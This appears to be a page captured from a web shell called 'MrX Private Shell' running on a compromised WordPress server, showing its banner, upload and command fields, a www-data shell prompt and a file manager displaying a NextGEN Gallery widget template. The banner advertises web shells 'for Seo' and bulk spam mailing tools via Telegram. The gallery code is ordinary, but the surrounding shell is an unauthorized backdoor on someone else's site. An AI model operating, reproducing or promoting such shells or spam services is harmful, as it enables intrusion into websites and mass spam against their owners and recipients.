__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
<?php
$controller = new \Imagely\NGG\DisplayType\Controller();
$storage    = \Imagely\NGG\DataStorage\Manager::get_instance();

$effect_code = $controller->get_effect_code( $gallery->displayed_gallery );
$settings    = $gallery->displayed_gallery->get_entity()->display_settings;

echo $settings['widget_setting_before_widget']
	. $settings['widget_setting_before_title']
	. $settings['widget_setting_title']
	. $settings['widget_setting_after_title'];
?>
<?php // keep the following a/img on the same line ?>
<div class="ngg-widget entry-content">
	<?php foreach ( $images as $image ) { ?>
		<a href="<?php echo esc_attr( $storage->get_image_url( $image, 'full', true ) ); ?>"
			title="<?php echo esc_attr( $image->description ); ?>"
			data-image-id='<?php echo esc_attr( $image->pid ); ?>'
			<?php echo $effect_code; ?>
			><img title="<?php echo esc_attr( \Imagely\NGG\Display\I18N::ngg_plain_text_alt_title_attributes( $image->alttext ) ); ?>"
				alt="<?php echo esc_attr( \Imagely\NGG\Display\I18N::ngg_plain_text_alt_title_attributes( $image->alttext ) ); ?>"
				src="<?php echo esc_attr( $storage->get_image_url( $image, $settings['image_type'], true ) ); ?>"
				width="<?php echo esc_attr( $settings['image_width'] ); ?>"
				height="<?php echo esc_attr( $settings['image_height'] ); ?>"
			/></a>
	<?php } ?>
</div>

<?php echo $settings['widget_setting_after_widget']; ?>

Filemanager

Name Type Size Permission Actions
Gallery.php File 1.36 KB 0644
MediaRSS.php File 650 B 0644
Slideshow.php File 185 B 0644
Filemanager